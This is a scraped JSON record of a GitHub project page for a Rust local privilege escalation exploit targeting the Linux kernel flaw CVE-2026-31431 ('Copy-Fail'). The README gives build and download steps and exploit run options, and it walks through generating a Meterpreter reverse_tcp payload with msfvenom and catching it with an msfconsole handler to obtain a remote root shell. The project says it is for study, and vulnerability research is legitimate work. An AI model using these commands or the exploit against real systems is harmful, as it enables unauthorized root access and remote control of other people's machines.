[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-80550":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":16,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":17,"rankGlobal":10,"rankLanguage":10,"license":18,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":19,"hasPages":19,"topics":21,"createdAt":10,"pushedAt":10,"updatedAt":35,"readmeContent":36,"aiSummary":37,"trendingCount":15,"starSnapshotCount":15,"syncStatus":38,"lastSyncTime":39,"discoverSource":40},80550,"CVE-2026-31431-Linux-Copy-Fail","iss4cf0ng\u002FCVE-2026-31431-Linux-Copy-Fail","iss4cf0ng","Rust implementation Exploit\u002FPoC of CVE-2026-31431-Linux-Copy-Fail, allow executing customized shellcode (such as Meterpreter).","https:\u002F\u002Fiss4cf0ng.github.io\u002F2026\u002F04\u002F30\u002F2026-4-30-CVE-2026-31431\u002F",null,"Rust",52,20,51,0,1,3.97,"MIT License",false,"main",[22,23,24,25,26,27,28,29,30,31,32,33,34],"cve","cve-2026-31431","exploit","explotation","linux","linux-vulnerability","poc","privilege-escalation","privilege-escalation-exploits","proof-of-concept","rust","vulnerability","vulnerable","2026-06-12 02:04:03","# CVE-2026-31431 - Linux Copy-Fail Exploit (Rust)\n\nA Rust implementation of a local privilege escalation exploit for CVE-2026-31431 (Copy-Fail).\n\nIt allows executing customized shellcode (such as **Meterpreter**)\n\n\u003Cp align=\"center\">\n    \u003Cimg src=\"https:\u002F\u002Fiss4cf0ng.github.io\u002Fimages\u002Fmeme\u002Fterrible_cake.png\" width=200\u002F>\n\u003C\u002Fp>\n\n# Introduction\n\nXint disclosed CVE-2026-31431, an arbitrary page cache write vulnerability that chains `AF_ALG` and `splice()` to achieve a 4-byte write primitive.\n\nSource: [Copy Fail: 732 Bytes to Root on Every Major Linux Distribution](https:\u002F\u002Fxint.io\u002Fblog\u002Fcopy-fail-linux-distributions)\n\n# Disclaimer\n\nThis project was developed as part of my personal interest in studying cybersecurity. However, it may potentially be misused for malicious purposes.\n\nPlease do NOT use this tool for any illegal activities.\n\nThe author is not responsible for any misuse of this software.\n\n# Acknowledgement\n\n- [theori-io\u002Fcopy-fail-CVE-2026-31431](https:\u002F\u002Fgithub.com\u002Ftheori-io\u002Fcopy-fail-CVE-2026-31431)\n\n> Note: The original work uses a compressed\u002Fencoded shellcode (e.g., `\u002Fbin\u002Fsh`). In this implementation, I replaced it with a raw (uncompressed) `\u002Fbin\u002Fbash` shellcode, making it easier to customize or directly replace with user-supplied payloads.\n\n# How to Compile\n\nClone the project, then execute `build.sh`:\n\n```bash\ngit clone git@github.com:iss4cf0ng\u002FCVE-2026-31431-Linux-Copy-Fail\ncd .\u002FCVE-2026-31431-Linux-Copy-Fail\nchmod +x .\u002Fbuild.sh\n.\u002Fbuild.sh\n```\n\n# Usage\n\nDownload and extract the release package:\n\n```bash\nwget https:\u002F\u002Fgithub.com\u002Fiss4cf0ng\u002FCVE-2026-31431-Linux-Copy-Fail\u002Freleases\u002Flatest\u002Fdownload\u002FCVE-2026-31431-Linux-Fail.gz\ntar -xzf CVE-2026-31431-Linux-Fail.gz\nchmod +x CVE-2026-31431-Linux-Copy-Fail_x64\nchmod +x CVE-2026-31431-Linux-Copy-Fail_x86\n```\n\nThe binaries provide the options below:\n\n```bash\n.\u002FCVE-2026-31431-Linux-Copy-Fail --test\n.\u002FCVE-2026-31431-Linux-Copy-Fail --exploit\n.\u002FCVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin\n```\n\n# Demonstration\n\n## Test Vulnerability\n\nOn the vulnerable machine:\n\n```bash\n.\u002FCVE-2026-31431-Linux-Copy-Fail --test\n```\n\n\u003Cp align=\"center\">\n    \u003Cimg src=\"https:\u002F\u002Fiss4cf0ng.github.io\u002Fimages\u002Farticle\u002F2026-4-30-CVE-2026-31431\u002F1.png\" width=800\u002F>\n\u003C\u002Fp>\n\n## Exploitation\n\n```bash\n.\u002FCVE-2026-31431-Linux-Copy-Fail --exploit\n```\n\n\u003Cp align=\"center\">\n    \u003Cimg src=\"https:\u002F\u002Fiss4cf0ng.github.io\u002Fimages\u002Farticle\u002F2026-4-30-CVE-2026-31431\u002F2.png\" width=800\u002F>\n\u003C\u002Fp>\n\n## Meterpreter\n\nUse the command (set **PrependSetUid** to `True`) below to generate **Meterpreter** payload:\n\n```bash\nmsfvenom -p linux\u002Fx64\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin\n```\nOn the attacker machine (Kali Linux):\n\n```bash\nmsfconsole\nuse exploit\u002Fmulti\u002Fhandler\nset payload linux\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\nset lhost 192.168.1.x\nset lport 4444\nrun\n```\n\nOn the vulnerable machine:\n\n```\n.\u002FCVE-2026-31431-Linux-Copy-Fail --bin payload.bin\n```\n\n\u003Cp align=\"center\">\n    \u003Cimg src=\"https:\u002F\u002Fiss4cf0ng.github.io\u002Fimages\u002Farticle\u002F2026-4-30-CVE-2026-31431\u002F3.png\" width=800\u002F>\n\u003C\u002Fp>\n\n\u003Cp align=\"center\">\n    \u003Cimg src=\"https:\u002F\u002Fiss4cf0ng.github.io\u002Fimages\u002Farticle\u002F2026-4-30-CVE-2026-31431\u002F4.png\" width=800\u002F>\n\u003C\u002Fp>\n\n# Affected Versions\n\n- [Ubuntu](https:\u002F\u002Fubuntu.com\u002Fsecurity\u002FCVE-2026-31431)\n- [Redhat](https:\u002F\u002Faccess.redhat.com\u002Fsecurity\u002Fcve\u002Fcve-2026-31431)\n","该项目是一个用Rust编写的CVE-2026-31431漏洞的本地提权利用程序，允许执行自定义shellcode（如Meterpreter）。其核心功能在于通过利用Linux内核中的任意页缓存写入漏洞，结合`AF_ALG`和`splice()`机制实现权限提升。技术特点包括使用Rust语言编写，提供可定制的shellcode执行能力，支持直接替换用户提供的payload。适用于安全研究人员、渗透测试人员在受控环境中进行漏洞分析与验证，以增强系统安全性。请注意，本项目仅供学习交流使用，禁止用于非法目的。",2,"2026-06-11 04:01:10","CREATED_QUERY"]